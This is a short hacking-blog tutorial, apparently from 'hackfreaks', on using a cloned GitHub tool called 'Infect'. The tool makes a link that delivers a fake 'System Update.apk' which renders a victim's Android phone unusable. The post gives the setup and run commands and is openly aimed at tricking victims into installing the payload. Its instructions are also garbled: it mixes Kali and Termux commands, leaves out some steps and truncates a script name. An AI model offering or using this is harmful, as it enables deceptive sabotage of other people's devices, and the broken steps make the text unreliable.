KILL A SMARTPHONE WITH A LINK


 How can one malicious link literally "kill" an Android smartphone?


 Let's get started freaks :)


 1. First, open the Kali Linux terminal and enter the following command to update packages:

 pkg update && pkg upgrade


 2. Before creating a malicious link, you need to install git and 


Python using these commands:


 3. Next, install the Lolcat utility:

 pip install lolcat


 4. Clone this particular repository from 


⭕git clone

 https://github.com/noob-hackers/Infect


 5. Go to the folder of our "weapon":

 cd Infect


 6. Click and run:

 bash infect.s


Once launched, select the first    item. Brought to you by hackfreaks official Further, we simply agree with everything, pressing Enter three times in a row.

 Done!


 When the victim follows our link, a file called System Update.apk will be downloaded to the device, but this is not enough.


 It is necessary for the victim to install and run the file, only after that the victim's phone will be infected with the Elite virus, which simply will not allow using the device.




Enjoy! Follow us for more...

No comments:

Post a Comment

How to connect to an FTP server from Linux?

To connect to an FTP server from a Linux system, you can use either a command-line FTP client or a graphical one. Here’s how to do it usin...